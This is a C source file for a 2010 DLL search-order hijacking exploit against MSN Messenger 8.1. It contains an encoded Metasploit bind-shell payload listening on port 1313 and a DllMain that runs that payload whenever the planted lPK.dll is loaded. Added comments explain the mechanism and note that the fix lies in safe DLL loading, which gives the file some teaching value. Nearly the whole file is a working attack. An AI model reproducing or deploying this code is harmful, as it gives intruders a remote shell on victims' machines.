/*
 * Exploit Title: MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll)
 * Date: October 7, 2010
 * Author: Mu$lim redouan@live.ma
 * Version: 8.1
 * Tested on: Windows XP SP3 fr
 * File Vulnerable:
 *   - msnmsgr.exe
 *   - livecall.exe
 *
 * Context: a DLL search-order hijack proof of concept. The listed host
 * executables are expected to resolve a library named lPK.dll by name
 * (the resolution mechanism itself is not shown in this listing). The
 * defensive fix lives on the loading side (fully qualified load paths,
 * safe DLL search mode), not in this file.
 */

/*
 * NOTE(review): the header name after #include was lost in extraction.
 * The Win32 types used below (BOOL, WINAPI, HANDLE, DWORD, LPVOID) are
 * declared by the platform SDK headers.
 */
#include

/* Defined but unused in this listing: DllMain below is not decorated with it. */
#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
 * AutoRunScript=
 *
 * 31 literals of 15 bytes plus one of 11 bytes = 476 bytes, matching the
 * size stated above; the array is 477 bytes including the implicit NUL.
 * The bytes are opaque (encoded) and are not interpreted anywhere in this
 * file, only handed to DllMain as a call target.
 * NOTE(review): this is ordinary initialized data; whether its pages are
 * executable at run time depends on the section protection and the host's
 * DEP policy, neither of which this listing controls — confirm on target
 * build before treating the PoC as reliable.
 */
unsigned char buf[] =
"\x33\xc9\xb1\x71\xd9\xcc\xd9\x74\x24\xf4\x5a\xb8\x8b\xf0\x6b"
"\x88\x31\x42\x14\x03\x42\x14\x83\xea\x77\x12\x9e\x51\x4b\x0a"
"\x15\x46\xa7\x13\x2e\xc4\x17\x2d\x90\xfa\x5e\x1c\x44\xcc\x17"
"\x46\x1a\xc1\x2b\x7b\x6b\x0b\xc9\xcb\x79\xf3\x02\x70\xa7\x1c"
"\x1a\x18\x5e\xea\x0e\x4c\x26\x6d\x61\x78\x82\x18\x2e\x5c\xb0"
"\x47\x78\xb2\xc4\x13\xa2\x2b\xfa\x10\xe4\x75\x67\xb5\x3c\x0f"
"\xd8\xbc\xef\xae\xdd\xf7\x7c\x02\x82\xd9\x94\x69\xf6\x52\x08"
"\xc3\xdd\x4d\x9f\x38\x1f\x4c\x58\x59\x99\x20\xce\x33\x2b\xe6"
"\x9e\x58\x2a\x15\x3a\xe7\xac\x30\x0f\xd9\x19\xf0\xbc\x96\xe1"
"\xc5\xdc\xfc\xe7\x42\x6e\x35\x16\x4a\xf8\x16\x82\x92\x75\xcd"
"\x72\xb0\x29\x9e\xe4\xad\xa0\x37\x18\x21\xf9\x5a\x28\xca\xc7"
"\x9e\xa3\x1d\xd5\xe7\xbe\xce\xb6\x58\x9a\x29\xdc\x1a\xba\x13"
"\x72\x13\x09\x87\x4c\x1c\xf4\x9a\x33\x30\x57\x38\x59\x4f\x63"
"\x4a\x8f\xdf\x2b\xc7\x3b\x4a\x2d\x22\x97\x08\x8d\xf0\x36\x57"
"\x04\x14\x71\x65\x45\x49\xf3\x0c\x20\xae\x9d\xef\xc1\xec\xe7"
"\xcb\x29\x4f\x12\x65\x23\x10\xb5\xbc\x8d\xa0\xaf\xc8\x72\x85"
"\x6c\x72\x2e\xe8\x22\x8f\x3b\x16\x40\x86\x68\x80\x7d\xaf\xf4"
"\xd1\xcd\xf6\x7e\xd5\x29\x45\xdb\x05\x92\x29\xc8\xe2\xb4\x13"
"\xfb\xeb\x3b\x9e\x9c\xfe\x62\xac\x9d\xa1\x5c\x9b\x40\x3f\x12"
"\xc6\x92\xf6\x5c\x16\xdb\x64\x62\xcd\x20\x58\x5f\x69\x71\x80"
"\x11\xa4\xde\x36\xf3\x73\x53\x86\x07\xba\x93\x68\x03\x99\xaf"
"\xf7\xd5\x91\x1f\xcb\xc3\x0e\x66\x94\xdc\x5a\x69\x57\xe3\x76"
"\x21\x98\x42\x03\x51\x0e\x59\x36\x6f\x8d\xca\x74\xfa\x6e\x45"
"\x1d\x97\x67\x4b\x6f\xc2\xa6\xeb\xe2\x6d\xc0\x1a\xe7\xae\x0b"
"\x40\xc5\xbe\x68\x96\xbb\x8e\xe3\x0f\x6e\xb4\x4e\x25\x14\xe0"
"\xd0\xa4\x5e\x63\xea\xb6\xec\x72\x47\xbb\xf2\x2d\x24\xce\xa1"
"\x5d\x4f\x3b\x15\xf7\x43\x09\x8d\x49\x29\xa6\x4e\xf2\x38\xcc"
"\x9c\x3f\x40\x37\x0d\x9d\xe6\x85\x77\xb4\x01\xf8\x66\x3f\x0a"
"\x04\x88\x79\x50\xeb\x51\xa7\xf6\x13\x98\x88\xe5\x92\x8b\x5d"
"\xc4\x69\x69\xdb\x3a\x19\x03\xf8\xf5\xde\x75\x17\x75\x1d\xd3"
"\x80\x55\xd3\x72\xcb\xd5\x04\x7c\x2d\xbd\xdd\x09\xee\x44\x57"
"\x5a\x72\x31\xac\xfb\x9b\xf9\x5f\x59\xb0\xfd";

/*
 * DLL entry point.
 *
 * Casts the byte array above to a function pointer and calls it
 * unconditionally. fdwReason is never inspected, so the call is attempted
 * on every loader notification (process attach/detach, thread
 * attach/detach), not only DLL_PROCESS_ATTACH; hinstDLL and lpvReserved
 * are unused. Calling through a pointer derived from a data object is
 * undefined behavior in standard C — the listing relies on the compiler
 * emitting a plain indirect call.
 *
 * Returns 0 (FALSE) if the call ever returns, which the loader treats as a
 * failed attach and unloads the module.
 */
BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    int (*func)();
    /* The pointer-to-function cast is what turns the data array into a call target. */
    func = (int (*)()) buf;
    /* The (int) cast is redundant: func already returns int, and the value is discarded. */
    (int)(*func)();
    return 0;
}